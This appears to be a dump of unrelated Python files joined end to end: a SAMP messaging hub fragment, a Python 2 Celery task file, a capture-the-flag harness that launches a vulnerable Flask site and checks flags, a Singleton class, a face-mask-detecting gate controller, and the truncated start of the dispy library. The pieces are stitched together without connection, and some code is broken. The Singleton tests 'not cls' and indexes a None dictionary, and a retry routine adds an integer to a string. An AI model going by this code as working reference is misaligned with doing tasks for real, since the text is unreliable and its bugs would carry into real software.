recipient_ids = self._notify_all_(private_key, message) return recipient_ids else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _notify_all_(self, sender_private_key, message): recipient_ids = [] msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"]) for mtype in msubs: if mtype in self._mtype2ids: for key in self._mtype2ids[mtype]: if key != sender_private_key: _recipient_id = self._private_keys[key][0] recipient_ids.append(_recipient_id) self._launch_thread(target=self._notify, args=(sender_private_key, _recipient_id, message) ) return recipient_ids def _call(self, private_key, recipient_id, msg_tag, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if self._is_subscribed(self._public_id_to_private_key(recipient_id), message["samp.mtype"]) is False: raise SAMPProxyError(2, "Client {} not subscribed to MType {}" .format(recipient_id, message["samp.mtype"])) public_id = self._private_keys[private_key][0] msg_id = self._get_new_hub_msg_id(public_id, msg_tag) self._launch_thread(target=self._call_, args=(private_key, public_id, recipient_id, msg_id, message)) return msg_id else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _call_(self, sender_private_key, sender_public_id, recipient_public_id, msg_id, message): if sender_private_key not in self._private_keys: return try: log.debug("call {} from {} to {} ({})".format( msg_id.split(";;")[0], sender_public_id, recipient_public_id, message["samp.mtype"])) recipient_private_key = self._public_id_to_private_key(recipient_public_id) arg_params = (sender_public_id, msg_id, message) samp_methodName = "receiveCall" self._retry_method(recipient_private_key, recipient_public_id, samp_methodName, arg_params) except Exception as exc: warnings.warn("{} call {} from client {} to client {} failed " "[{},{}]".format(message["samp.mtype"], msg_id.split(";;")[0], sender_public_id, recipient_public_id, type(exc), exc), SAMPWarning) def _call_all(self, private_key, msg_tag, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if "samp.mtype" not in message: raise SAMPProxyError(3, "samp.mtype keyword is missing in " "message tagged as {}".format(msg_tag)) public_id = self._private_keys[private_key][0] msg_id = self._call_all_(private_key, public_id, msg_tag, message) return msg_id else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _call_all_(self, sender_private_key, sender_public_id, msg_tag, message): msg_id = {} msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"]) for mtype in msubs: if mtype in self._mtype2ids: for key in self._mtype2ids[mtype]: if key != sender_private_key: _msg_id = self._get_new_hub_msg_id(sender_public_id, msg_tag) receiver_public_id = self._private_keys[key][0] msg_id[receiver_public_id] = _msg_id self._launch_thread(target=self._call_, args=(sender_private_key, sender_public_id, receiver_public_id, _msg_id, message)) return msg_id def _call_and_wait(self, private_key, recipient_id, message, timeout): self._update_last_activity_time(private_key) if private_key in self._private_keys: timeout = int(timeout) now = time.time() response = {} msg_id = self._call(private_key, recipient_id, "samp::sync::call", message) self._sync_msg_ids_heap[msg_id] = None while self._is_running: if 0 < timeout <= time.time() - now: del(self._sync_msg_ids_heap[msg_id]) raise SAMPProxyError(1, "Timeout expired!") if self._sync_msg_ids_heap[msg_id] is not None: response = copy.deepcopy(self._sync_msg_ids_heap[msg_id]) del(self._sync_msg_ids_heap[msg_id]) break time.sleep(0.01) return response else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _reply(self, private_key, msg_id, response): """ The main method that gets called for replying. This starts up an asynchronous reply thread and returns. """ self._update_last_activity_time(private_key) if private_key in self._private_keys: self._launch_thread(target=self._reply_, args=(private_key, msg_id, response)) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return {} def _reply_(self, responder_private_key, msg_id, response): if responder_private_key not in self._private_keys or not msg_id: return responder_public_id = self._private_keys[responder_private_key][0] counter, hub_public_id, recipient_public_id, recipient_msg_tag = msg_id.split(";;", 3) try: log.debug("reply {} from {} to {}".format( counter, responder_public_id, recipient_public_id)) if recipient_msg_tag == "samp::sync::call": if msg_id in self._sync_msg_ids_heap.keys(): self._sync_msg_ids_heap[msg_id] = response else: recipient_private_key = self._public_id_to_private_key(recipient_public_id) arg_params = (responder_public_id, recipient_msg_tag, response) samp_method_name = "receiveResponse" self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params) except Exception as exc: warnings.warn("{} reply from client {} to client {} failed [{}]" .format(recipient_msg_tag, responder_public_id, recipient_public_id, exc), SAMPWarning) def _retry_method(self, recipient_private_key, recipient_public_id, samp_method_name, arg_params): """ This method is used to retry a SAMP call several times. Parameters ---------- recipient_private_key The private key of the receiver of the call recipient_public_key The public key of the receiver of the call samp_method_name : str The name of the SAMP method to call arg_params : tuple Any additional arguments to be passed to the SAMP method """ if recipient_private_key is None: raise SAMPHubError("Invalid client ID") from . import conf for attempt in range(conf.n_retries): if not self._is_running: time.sleep(0.01) continue try: if (self._web_profile and recipient_private_key in self._web_profile_callbacks): # Web Profile callback = {"samp.methodName": samp_method_name, "samp.params": arg_params} self._web_profile_callbacks[recipient_private_key].put(callback) else: # Standard Profile hub = self._xmlrpc_endpoints[recipient_public_id][1] getattr(hub.samp.client, samp_method_name)(recipient_private_key, *arg_params) except xmlrpc.Fault as exc: log.debug("{} XML-RPC endpoint error (attempt {}): {}" .format(recipient_public_id, attempt + 1, exc.faultString)) time.sleep(0.01) else: return # If we are here, then the above attempts failed error_message = samp_method_name + " failed after " + conf.n_retries + " attempts" raise SAMPHubError(error_message) def _public_id_to_private_key(self, public_id): for private_key in self._private_keys.keys(): if self._private_keys[private_key][0] == public_id: return private_key return None def _get_new_hub_msg_id(self, sender_public_id, sender_msg_id): with self._thread_lock: self._hub_msg_id_counter += 1 return "msg#{};;{};;{};;{}".format(self._hub_msg_id_counter, self._hub_public_id, sender_public_id, sender_msg_id) def _update_last_activity_time(self, private_key=None): with self._thread_lock: self._last_activity_time = time.time() if private_key is not None: self._client_activity_time[private_key] = time.time() def _receive_notification(self, private_key, sender_id, message): return "" def _receive_call(self, private_key, sender_id, msg_id, message): if private_key == self._hub_private_key: if "samp.mtype" in message and message["samp.mtype"] == "samp.app.ping": self._reply(self._hub_private_key, msg_id, {"samp.status": SAMP_STATUS_OK, "samp.result": {}}) elif ("samp.mtype" in message and (message["samp.mtype"] == "x-samp.query.by-meta" or message["samp.mtype"] == "samp.query.by-meta")): ids_list = self._query_by_metadata(message["samp.params"]["key"], message["samp.params"]["value"]) self._reply(self._hub_private_key, msg_id, {"samp.status": SAMP_STATUS_OK, "samp.result": {"ids": ids_list}}) return "" else: return "" def _receive_response(self, private_key, responder_id, msg_tag, response): return "" def _web_profile_register(self, identity_info, client_address=("unknown", 0), origin="unknown"): self._update_last_activity_time() if not client_address[0] in ["localhost", "127.0.0.1"]: raise SAMPProxyError(403, "Request of registration rejected " "by the Hub.") if not origin: origin = "unknown" if isinstance(identity_info, dict): # an old version of the protocol provided just a string with the app name if "samp.name" not in identity_info: raise SAMPProxyError(403, "Request of registration rejected " "by the Hub (application name not " "provided).") # Red semaphore for the other threads self._web_profile_requests_semaphore.put("wait") # Set the request to be displayed for the current thread self._web_profile_requests_queue.put((identity_info, client_address, origin)) # Get the popup dialogue response response = self._web_profile_requests_result.get() # OK, semaphore green self._web_profile_requests_semaphore.get() if response: register_map = self._perform_standard_register() translator_url = ("http://localhost:{}/translator/{}?ref=" .format(self._web_port, register_map["samp.private-key"])) register_map["samp.url-translator"] = translator_url self._web_profile_server.add_client(register_map["samp.private-key"]) return register_map else: raise SAMPProxyError(403, "Request of registration rejected by " "the user.") def _web_profile_allowReverseCallbacks(self, private_key, allow): self._update_last_activity_time() if private_key in self._private_keys: if allow == "0": if private_key in self._web_profile_callbacks: del self._web_profile_callbacks[private_key] else: self._web_profile_callbacks[private_key] = queue.Queue() else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _web_profile_pullCallbacks(self, private_key, timeout_secs): self._update_last_activity_time() if private_key in self._private_keys: callback = [] callback_queue = self._web_profile_callbacks[private_key] try: while self._is_running: item_queued = callback_queue.get_nowait() callback.append(item_queued) except queue.Empty: pass return callback else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) class WebProfileDialog: """ A base class to make writing Web Profile GUI consent dialogs easier. The concrete class must: 1) Poll ``handle_queue`` periodically, using the timer services of the GUI's event loop. This function will call ``self.show_dialog`` when a request requires authorization. ``self.show_dialog`` will be given the arguments: - ``samp_name``: The name of the application making the request. - ``details``: A dictionary of details about the client making the request. - ``client``: A hostname, port pair containing the client address. - ``origin``: A string containing the origin of the request. 2) Call ``consent`` or ``reject`` based on the user's response to the dialog. """ def handle_queue(self): try: request = self.queue_request.get_nowait() except queue.Empty: # queue is set but empty pass except AttributeError: # queue has not been set yet pass else: if isinstance(request[0], str): # To support the old protocol version samp_name = request[0] else: samp_name = request[0]["samp.name"] self.show_dialog(samp_name, request[0], request[1], request[2]) def consent(self): self.queue_result.put(True) def reject(self): self.queue_result.put(False)
tasks.py
# encoding=utf-8 __author__ = 'wdx' import os print os.path.dirname(__file__) from celery import Celery from msg_handler import MsgHandler from core.processor_watcher import ProcessorWatcher from watchdog.observers import Observer from threading import Thread app = Celery('tasks',backend='amqp', broker='amqp://') msg_handler = MsgHandler() msg_queue = msg_handler.get_msg_queue()#得到消息队列 msg_handler_thread = Thread(target=msg_handler.process_msg) msg_handler_thread.start() # 打开一个线程,等待(block)注册或处理事件 event_handler = ProcessorWatcher(queue=msg_queue) observer = Observer() observer.schedule(event_handler, event_handler.path, recursive=True) observer.start() #监控processor中文件的变化 ''' 对oplog 的事件处理 ''' @app.task def oplog(msg): #传入oplog消息 msg_handler.notify_listeners(msg) print 'oplog'
main.py
# Content from http://www.eveandersson.com/pi/poetry/ from os import path from random import choice from vulnerable_flask.website import start_app from multiprocessing import Process # Declare paths to the files PATH = path.normpath(path.dirname(__file__)) FLAG_PATH = path.join(PATH, "secrets", "flag.txt") # Get the challenge name NAME = __name__.split(".")[0] def main(server, data): # Get the number of elements passed in the command switch = len(data) # If only the command was sent if switch == 1: # Generate the flag flag = generate_flag(32) # Inform what flag was generated print(NAME + ": Generated following flag: " + flag) # Save the flag to the file save_flag(flag) # Avoid running server twice if NAME + "_flag" not in server.cache.keys(): # Inform that a website is being created print(NAME + ": Creating website...") # Run the server Process(target=start_app).start() # Inform when it was loaded print(NAME + ": Website created!") # Send the message that a website was created message = "Website started!" + "\r\n" else: # Inform the website is already up message = "Website already running!" + "\r\n" # Add the flag to cache, to check the answer later server.cache[NAME + "_flag"] = flag # If the help argument was included elif switch == 2 and data[1] == "help": # Build the help message message = "!" + NAME + " - starts the vulnerable flask challenge" + "\r\n" + \ "!" + NAME + " <answer> - checks the answer of the challenge" + "\r\n" # If any non-help arguments were included else: # Retrieve the answer answer = data[1] # Check if the flag was actually generated before if NAME + "_flag" in server.cache.keys(): # Inform what answer was received print(NAME + ": Received following answer: " + answer) # Check if the answer is correct if answer == server.cache.get(NAME + "_flag"): # Send the "correct!" message if the answer matches the flag message = "Correct! Well done!" + "\r\n" else: # Send the "incorrect!" message if the answer doesn't match the flag message = "Incorrect! Try again!" + "\r\n" else: # Inform the user that the challenge hasn't been executed yet message = "No website was ran yet! Type !" + NAME + " before sending an answer to it." + "\r\n" # Send the prepared message to the client server.send(message) def generate_flag(length): return "".join(choice("abcdefghijklmnopqrstuvwxyz_") for _ in range(length)) def save_flag(flag): with open(FLAG_PATH, "w", encoding="utf-8") as f: # Save the flag to the file f.write(flag) # Release the resources f.close()
single.py
__author__ = 'Aaron Yang' __email__ = 'byang971@usc.edu' __date__ = '8/20/2020 8:13 PM' import threading class Singleton(object): _lock = threading.Lock() _instances = None def __call__(cls, *args, **kwargs): with cls._lock: if not cls : instance = super().__call__(*args, **kwargs) cls._instances[cls] = instance return cls._instances[cls] def test_singleton(value: str) -> None: singleton = Singleton() print(singleton) for _ in range(33): obj = Singleton() print(obj) # for i in range(10): # process = threading.Thread(target=test_singleton, args=(i,)) # process.start()
totem.py
import cv2 from tensorflow.keras.applications.mobilenet_v2 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.models import load_model from datetime import datetime import numpy as np import threading import serial import time import os cv2.namedWindow('TotemUFSM', cv2.WND_PROP_FULLSCREEN) cv2.setWindowProperty('TotemUFSM', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN) BIAS = 0.2 # How much bigger the bias is, more sensible is the 'with mask' prediction (put a number between 0 and 1) def detect_and_predict_mask(frame, faceNet, maskNet): # grab the dimensions of the frame and then construct a blob from it (h, w) = frame.shape[:2] blob = cv2.dnn.blobFromImage(frame, 1.0, (300, 300), (104.0, 177.0, 123.0)) # pass the blob through the network and obtain the face detections faceNet.setInput(blob) detections = faceNet.forward() # initialize our list of faces, their corresponding locations, # and the list of predictions from our face mask network faces = list() locs = list() preds = list() # loop over the detections for i in range(0, detections.shape[2]): # extract the confidence (i.e., probability) associated with the detection confidence = detections[0, 0, i, 2] # filter out weak detections by ensuring the confidence is # greater than the minimum confidence if confidence > 0.6: # compute the (x, y)-coordinates of the bounding box for the object box = detections[0, 0, i, 3:7] * np.array([w, h, w, h]) (startX, startY, endX, endY) = box.astype("int") # ensure the bounding boxes fall within the dimensions of the frame (startX, startY) = (max(0, startX), max(0, startY)) (endX, endY) = (min(w - 1, endX), min(h - 1, endY)) # extract the face ROI, convert it from BGR to RGB channel # ordering, resize it to 224x224, and preprocess it face = frame[startY:endY, startX:endX] if not face.size == 0: face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) face = cv2.resize(face, (224, 224)) face = img_to_array(face) face = preprocess_input(face) # add the face and bounding boxes to their respective lists faces.append(face) locs.append((startX, startY, endX, endY)) # only make a predictions if at least one face was detected if len(faces) > 0: # for faster inference we'll make batch predictions on *all* # faces at the same time rather than one-by-one predictions # in the above for loop faces = np.array(faces, dtype="float32") preds = maskNet.predict(faces, batch_size=32) # return a 2-tuple of the face locations and their corresponding locations return locs, preds def rotate_bound(image, angle): # grab the dimensions of the image and then determine the center (h, w) = image.shape[:2] (cX, cY) = (w // 2, h // 2) # grab the rotation matrix (applying the negative of the # angle to rotate clockwise), then grab the sine and cosine # (i.e., the rotation components of the matrix) M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0) cos = np.abs(M[0, 0]) sin = np.abs(M[0, 1]) # compute the new bounding dimensions of the image nW = int((h * sin) + (w * cos)) nH = int((h * cos) + (w * sin)) # adjust the rotation matrix to take into account translation M[0, 2] += (nW / 2) - cX M[1, 2] += (nH / 2) - cY # perform the actual rotation and return the image image = cv2.UMat(image) return cv2.warpAffine(image, M, (nW, nH)) def compute_bound(): global locs, preds try: while not stop: if ret: # detect faces in the frame and determine if they are wearing a face mask or not (locs, preds) = detect_and_predict_mask(compute_frame, faceNet, maskNet) except: os.system("reboot") def gate_control(): global gate try: while not stop: data = arduino.readline() if data == 0: gate = True time.sleep(0.1) except: os.system("reboot") def draw_frame(image, c): ws = image.shape[0] hs = image.shape[1] image = cv2.UMat(image) image = cv2.line(image, (int(hs * 0.05), int(ws * 0.05)), (int(hs * 0.05), int(ws * 0.2)), c, 9) image = cv2.line(image, (int(hs * 0.05), int(ws * 0.05)), (int(hs * 0.2), int(ws * 0.05)), c, 9) image = cv2.line(image, (int(hs * 0.8), int(ws * 0.05)), (int(hs * 0.95), int(ws * 0.05)), c, 9) image = cv2.line(image, (int(hs * 0.95), int(ws * 0.05)), (int(hs * 0.95), int(ws * 0.2)), c, 9) image = cv2.line(image, (int(hs * 0.05), int(ws * 0.95)), (int(hs * 0.2), int(ws * 0.95)), c, 9) image = cv2.line(image, (int(hs * 0.05), int(ws * 0.8)), (int(hs * 0.05), int(ws * 0.95)), c, 9) image = cv2.line(image, (int(hs * 0.8), int(ws * 0.95)), (int(hs * 0.95), int(ws * 0.95)), c, 9) image = cv2.line(image, (int(hs * 0.95), int(ws * 0.8)), (int(hs * 0.95), int(ws * 0.95)), c, 9) return image # stop running all processes stop = False gate = True # False seams it is in opening process, True for already closed gate # start arduino connection arduino = serial.Serial(port='USB0', baudrate=115200, timeout=0.1) # load our serialized face detector model from disk print("[INFO] loading face detector model...") prototxtPath = os.path.sep.join(["face_detector", "deploy.prototxt"]) weightsPath = os.path.sep.join(["face_detector", "res10_300x300_ssd_iter_140000.caffemodel"]) faceNet = cv2.dnn.readNet(prototxtPath, weightsPath) # load the face mask detector model from disk print("[INFO] loading face mask detector model...") maskNet = load_model("mask.model") # camara capture cap = cv2.VideoCapture('nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1280, height=720, format=(string)NV12, framerate=(fraction)10/1 ! nvvidconv ! video/x-raw, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink', cv2.CAP_GSTREAMER) #cap = cv2.VideoCapture(0) assert cap.isOpened(), 'Cannot capture source' ret, frame = cap.read() frame_shape = frame.shape frame = rotate_bound(frame, 90) compute_frame = cv2.UMat.get(frame) # for text in output t_size = cv2.getTextSize(" ", cv2.FONT_HERSHEY_PLAIN, 1, 1)[0] frames = fps = count = 0 locs = list() preds = list() c_fps = list() static_frame_time = time.time() static_frame = False post_delay_time = time.time() post_delay = False data = 0 cb = threading.Thread(target=compute_bound) cb.setDaemon(True) cb.start() gate_thread = threading.Thread(target=gate_control) gate_thread.setDaemon(True) gate_thread.start() start = time.time() while True: try: if static_frame: if time.time() - static_frame_time >= 3: static_frame = False post_delay_time = time.time() post_delay = True else: ret, frame = cap.read() if not ret: pass color = (0, 0, 0) frame = rotate_bound(frame, 90) compute_frame = cv2.UMat.get(frame) # loop over the detected face locations and their corresponding locations if locs: big_w = big_h = mask = withoutMask = startX = startY = 0 for (box, pred) in zip(locs, preds): # unpack the bounding box and predictions (s_x, s_y, e_x, e_y) = box if big_h < e_y - s_y and big_w < e_x - s_x: (startX, startY, endX, endY) = box (mask, withoutMask) = pred big_h = e_y - s_y big_w = e_x - s_x # clamp coordinates that are outside of the image startX, startY = max(startX, 0), max(startY, 0) # determine the class label and color we'll use to draw the bounding box and text label = "Com Mascara" if mask + (mask*BIAS) > withoutMask - (withoutMask*BIAS) else "Sem Mascara" color = (0, 255, 0) if label == "Com Mascara" else (0, 0, 255) if big_h >= frame_shape[1] * 0.25 and big_w >= frame_shape[0] * 0.25: if not post_delay: # opening the gate if label == "Com Mascara" and gate: arduino.write(bytes(0, 'utf-8')) static_frame = True static_frame_time = time.time() elif label == "Sem Mascara" and gate: static_frame = True static_frame_time = time.time() cv2.putText(frame, "Por favor, utilize mascara!", (round(frame_shape[0]/25), round(frame_shape[1]/1.3)), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 3) else: if time.time() - post_delay_time >= 3: post_delay = False # include the probability in the label label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # display the label and bounding box rectangle on the output frame cv2.putText(frame, label, (startX, startY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2), cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2) # draw the bounds of the image frame = cv2.UMat.get(frame) frame = draw_frame(frame, color) # CURRENT TIME SHOWING now = datetime.now() current_time = now.strftime("%H:%M:%S") # FPS PRINTING cv2.rectangle(frame, (0, 0), (175, 20), (0, 0, 0), -1) c_fps.append(1 / (time.time() - start)) start = time.time() if len(c_fps) > 60: c_fps.pop(0) fps = sum(c_fps) / len(c_fps) cv2.putText(frame, current_time + " FPS : %3.2f" % fps, (0, t_size[1] + 2), cv2.FONT_HERSHEY_PLAIN, 1, [255, 255, 255], 1) # show the output frame cv2.imshow("TotemUFSM", frame) if cv2.waitKey(1) & 0xFF == ord('q'): stop = True break except: os.system("reboot") cap.release() cv2.destroyAllWindows() del faceNet del maskNet
__init__.py
#!/usr/bin/python3 """ dispy: Distribute computations among CPUs/cores on a single machine or machines in cluster(s), grid, cloud etc. for parallel execution. See http://dispy.sourceforge.net or https://pgiri.github.com/dispy for details. """ import os import sys import time import socket import inspect import stat import threading import re import ssl import hashlib import traceback import shelve import datetime import atexit import functools import queue import numbers import collections import struct import errno try: import netifaces except: netifaces = None import pycos from pycos import Task, Pycos, AsyncSocket, Singleton, serialize, deserialize __author__ = "Giridhar Pemmasani (pgiri@yahoo.com)" __email__ = "pgiri@yahoo.com" __copyright__ = "Copyright 2011, Giridhar Pemmasani" __contributors__ = [] __maintainer__ = "Giridhar Pemmasani (pgiri@yahoo.com)" __license__ = "Apache 2.0" __url__ = "http://dispy.sourceforge.net" __status__ = "Production" __version__ = "4.8.7" __all__ = ['logger', 'DispyJob', 'DispyNode', 'NodeAllocate', 'JobCluster', 'SharedJobCluster'] _dispy_version = __version__ MsgTimeout = 10 class DispyJob(object): """Job scheduled for execution with dispy. Once a job is scheduled (with a tuple of arguments), the __call__ method can be invoked. This will wait until the job is complete. The result of the call (either the return value in case of python methods or the exit value in case of programs) will be returned; the result is also available as .result member if needed. In addition, any output, error, exception messages from the job will be available as .stdout, .stderr and .exception members. The time when the job was submitted for execution on a node will be available as .start_time and when the job results became available as .end_time. .id field is initially set to None and may be assigned by user to any value that is appropriate. This may be useful, for example, to distinguish one job from another. .status is read-only field; it is set to one of Created, Running, Finished, Cancelled, Terminated and ProvisionalResult, indicating current status of job. If job is created for SharedJobCluster, status is not updated to Running when job is actually running. .ip_addr is read-inly field; it is set to IP address of node that executed job. .finish is a read-only event that is set when a job's results are available. """ __slots__ = ('id', 'result', 'stdout', 'stderr', 'exception', 'submit_time', 'start_time', 'end_time', 'status', 'ip_addr', 'finish', '_args', '_kwargs', '_dispy_job_') Created = 5 Running = 6 ProvisionalResult = 7 # NB: Cancelled, Terminated and Finished status should have # values in that order, as PriorityQueue sorts data. # Thus, if a job with provisional result is already in the queue # and a job is finished, finished/terminated job is processed (in # callback) last. Cancelled = 8 Terminated = 9 Abandoned = 10 Finished = 11 def __init__(self, args, kwargs): # id can be assigned by user as appropriate (e.g., to distinguish jobs) self.id = None # rest are read-only self.result = None self.stdout = None self.stderr = None self.exception = None self.submit_time = time.time() self.start_time = None self.end_time = None self.status = DispyJob.Created self.ip_addr = None self.finish = threading.Event() # rest are for dispy implementation only - these are opaque to clients self._args = args self._kwargs = kwargs self._dispy_job_ = None def __call__(self, clear=False): self.finish.wait() if clear: self.finish.clear() return self.result def __lt__(self, other): if isinstance(self._dispy_job_, _DispyJob_): if isinstance(other._dispy_job_, _DispyJob_): return self._dispy_job_ < other._dispy_job_ else: return True else: return False class DispyNodeAvailInfo(object): """A node's status is represented as available CPU as percent, memory in bytes and disk as bytes. This information is passed to NodeAllocte.allocate method and in cluster status callback with status DispyNode.AvailInfo. """ def __init__(self, cpu, memory, disk, swap): self.cpu = cpu self.memory = memory self.disk = disk self.swap = swap class DispyNode(object): """If 'cluster_status' is used when creating cluster, that function is called with an instance of this class as first argument. See 'cluster_status' in JobCluster below. """ Initialized = DispyJob.Created - 1 Closed = DispyJob.Finished + 5 AvailInfo = Closed + 1 def __init__(self, ip_addr, name, cpus): self.ip_addr = ip_addr self.name = name self.cpus = cpus self.avail_cpus = cpus self.busy = 0 self.jobs_done = 0 self.cpu_time = 0.0 self.update_time = 0 self.avail_info = None class NodeAllocate(object): """Objects of this class describe if / how many CPUs in a node are allocated to clusters. Each element of 'nodes' passed to JobCluster or SharedJobCluster is an object of this class; if the element passed is a string (host name or IP address), a tuple (see documentation for details), it is converted to NodeAllocate object with '_parse_node_allocs' function. This class can be specialized (inherited) to override, for example, 'allocate' method. """ def __init__(self, host, port=None, cpus=0): self.ip_addr = _node_ipaddr(host) if not self.ip_addr: logger.warning('host "%s" is invalid', host) self.ip_rex = '' else: self.ip_rex = self.ip_addr.replace('.', '\\.').replace('*', '.*') if port: try: port = int(port) assert port > 0 except: logger.warning('port must be > 0 for node "%s"', host) port = None self.port = port if cpus: try: cpus = int(cpus) except: logger.warning('Invalid cpus for "%s" ignored', host) cpus = 0 self.cpus = cpus def allocate(self, cluster, ip_addr, name, cpus, avail_info=None, platform=''): """When a node is found, dispy calls this method with the cluster for which the node is being allocated, IP address, name and CPUs available on that node. This method should return a number indicating number of CPUs to use. If return value is 0, the node is not used for that cluster. """ if re.match(self.ip_rex, ip_addr): if self.cpus > 0: cpus = min(cpus, self.cpus) elif (cpus + self.cpus) > 0: cpus = cpus + self.cpus return cpus return 0 # a cluster's "status" function (not "cluster_status" callback) # returns this structure; "nodes" is list of DispyNode objects and # "jobs_pending" is number of jobs that are not done yet ClusterStatus = collections.namedtuple('ClusterStatus', ['nodes', 'jobs_pending']) def num_min(*args): items = [arg for arg in args if isinstance(arg, numbers.Number)] if not items: return None return min(items) def num_max(*args): items = [arg for arg in args if isinstance(arg, numbers.Number)] if not items: return None return max(items) def _same_file(tgt, xf): """Internal use only. """ # TODO: compare checksum? try: stat_buf = os.stat(tgt) if stat_buf.st_size == xf.stat_buf.st_size and \ abs(stat_buf.st_mtime - xf.stat_buf.st_mtime) <= 1 and \ stat.S_IMODE(stat_buf.st_mode) == stat.S_IMODE(xf.stat_buf.st_mode): return True except: return False def auth_code(secret, sign): return hashlib.sha1((secret + sign).encode()).hexdigest().encode() def _node_ipaddr(node): """Internal use only. """ if not node: return None if node.find('*') >= 0: return node try: ip_addr = socket.getaddrinfo(node, None)[0] family = ip_addr[0] ip_addr = ip_addr[4][0] if family == socket.AF_INET6: # canonicalize so different platforms resolve to same string ip_addr = re.sub(r'^0+', '', ip_addr) ip_addr = re.sub(r':0+', ':', ip_addr) ip_addr = re.sub(r'::+', '::', ip_addr) # TODO: handle dot notation in last 4 bytes? return ip_addr except: return None def _parse_node_allocs(nodes): """Internal use only. """ node_allocs = [] for node in nodes: if isinstance(node, NodeAllocate): node_allocs.append(node) elif isinstance(node, str): node_allocs.append(NodeAllocate(node)) elif isinstance(node, dict): node_allocs.append(NodeAllocate(node.get('host', '*'), node.get('port', None), node.get('cpus', 0))) elif isinstance(node, tuple): node_allocs.append(NodeAllocate(*node)) elif isinstance(node, list): node_allocs.append(NodeAllocate(*tuple(node))) return [node_alloc for node_alloc in node_allocs if node_alloc.ip_addr] def node_addrinfo(node=None, socket_family=None): if node: try: node = socket.getaddrinfo(node, None)[0] except: return None if not socket_family: socket_family = node[0] elif node[0] != socket_family: node = None if node: node = node[4][0] if not socket_family: socket_family = socket.AF_INET if not socket_family: socket_family = socket.getaddrinfo(socket.gethostname(), None)[0][0] assert socket_family in (socket.AF_INET, socket.AF_INET6) ifn, addrinfo, netmask, broadcast = 0, None, None, None if netifaces: for iface in netifaces.interfaces(): if socket_family == socket.AF_INET: if addrinfo: break elif socket_family == socket.AF_INET6: if ifn and addrinfo: break ifn, addrinfo, netmask = 0, None, None for link in netifaces.ifaddresses(iface).get(socket_family, []): netmask = link.get('netmask', None) broadcast = link.get('broadcast', None) if socket_family == socket.AF_INET: if link.get('broadcast', '').startswith(link['addr'].split('.')[0]): if (not node) or (link['addr'] == node): addrinfo = socket.getaddrinfo(link['addr'], None)[0] break elif socket_family == socket.AF_INET6: if link['addr'].startswith('fe80:'): addr = link['addr'] if '%' not in addr.split(':')[-1]: addr = addr + '%' + interface for addr in socket.getaddrinfo(addr, None): if addr[2] == socket.IPPROTO_TCP: ifn = addr[4][-1] break elif link['addr'].startswith('fd'): for addr in socket.getaddrinfo(link['addr'], None): if addr[2] == socket.IPPROTO_TCP: addrinfo = addr break elif socket_family == socket.AF_INET6: logger.warning('IPv6 may not work without "netifaces" package!') if addrinfo: if not node: node = addrinfo[4][0] if not socket_family: socket_family = addrinfo[0] if not node: node = socket.gethostname() addrinfo = socket.getaddrinfo(node, None, socket_family, socket.SOCK_STREAM)[0] ip_addr = addrinfo[4][0] if addrinfo[0] == socket.AF_INET6: # canonicalize so different platforms resolve to same string ip_addr = re.sub(r'^0+', '', ip_addr) ip_addr = re.sub(r':0+', ':', ip_addr) ip_addr = re.sub(r'::+', '::', ip_addr) if not broadcast: broadcast = 'ff05::1' else: if not broadcast: broadcast = '<broadcast>' class AddrInfo(object): def __init__(self, family, ip, ifn, broadcast, netmask): self.family = family self.ip = ip self.ifn = ifn self.broadcast = broadcast self.netmask = netmask self.ext_ip_addr = None addrinfo = AddrInfo(addrinfo[0], _node_ipaddr(addrinfo[4][0]), ifn, broadcast, netmask) return addrinfo # This tuple stores information about partial functions; for # now'setup' and 'cleanup' functions can be partial functions. # TODO: useful to have 'compute' as partial function as well? _Function = collections.namedtuple('_Function', ['name', 'args', 'kwargs']) logger = pycos.Logger('dispy') class _Compute(object): """Internal use only. """ func_type = 1 prog_type = 2 def __init__(self, compute_type, name): assert compute_type == _Compute.func_type or compute_type == _Compute.prog_type self.type = compute_type self.name = name self.id = None self.code = '' self.dest_path = None self.xfer_files = set() self.reentrant = False self.exclusive = True self.setup = None self.cleanup = None self.scheduler_ip_addr = None self.scheduler_port = None self.node_ip_addr = None self.auth = None self.job_result_port = None self.pulse_interval = None def __getstate__(self): state = dict(self.__dict__) return state class _XferFile(object): """Internal use only. """ def __init__(self, name, dest_path, compute_id=None): self.name = name self.dest_path = dest_path self.compute_id = compute_id self.stat_buf = os.stat(name) self.sep = os.sep class _Node(object): """Internal use only. """ __slots__ = ['ip_addr', 'port', 'name', 'cpus', 'avail_cpus', 'busy', 'cpu_time', 'clusters', 'auth', 'secret', 'keyfile', 'certfile', 'last_pulse', 'scheduler_ip_addr', '_jobs', 'pending_jobs', 'avail_info', 'platform', 'sock_family'] def __init__(self, ip_addr, port, cpus, sign, secret, platform='', keyfile=None, certfile=None): self.ip_addr = ip_addr if re.match('\d+\.', ip_addr): self.sock_family = socket.AF_INET else: self.sock_family = socket.AF_INET6 self.port = port self.name = None self.cpus = cpus self.avail_cpus = cpus self.busy = 0.0 self.cpu_time = 0.0 self.clusters = set() self.auth = auth_code(secret, sign) self.secret = secret self.keyfile = keyfile self.certfile = certfile self.last_pulse = None self.scheduler_ip_addr = None self.pending_jobs = [] self.avail_info = None self.platform = platform def setup(self, compute, exclusive=True, 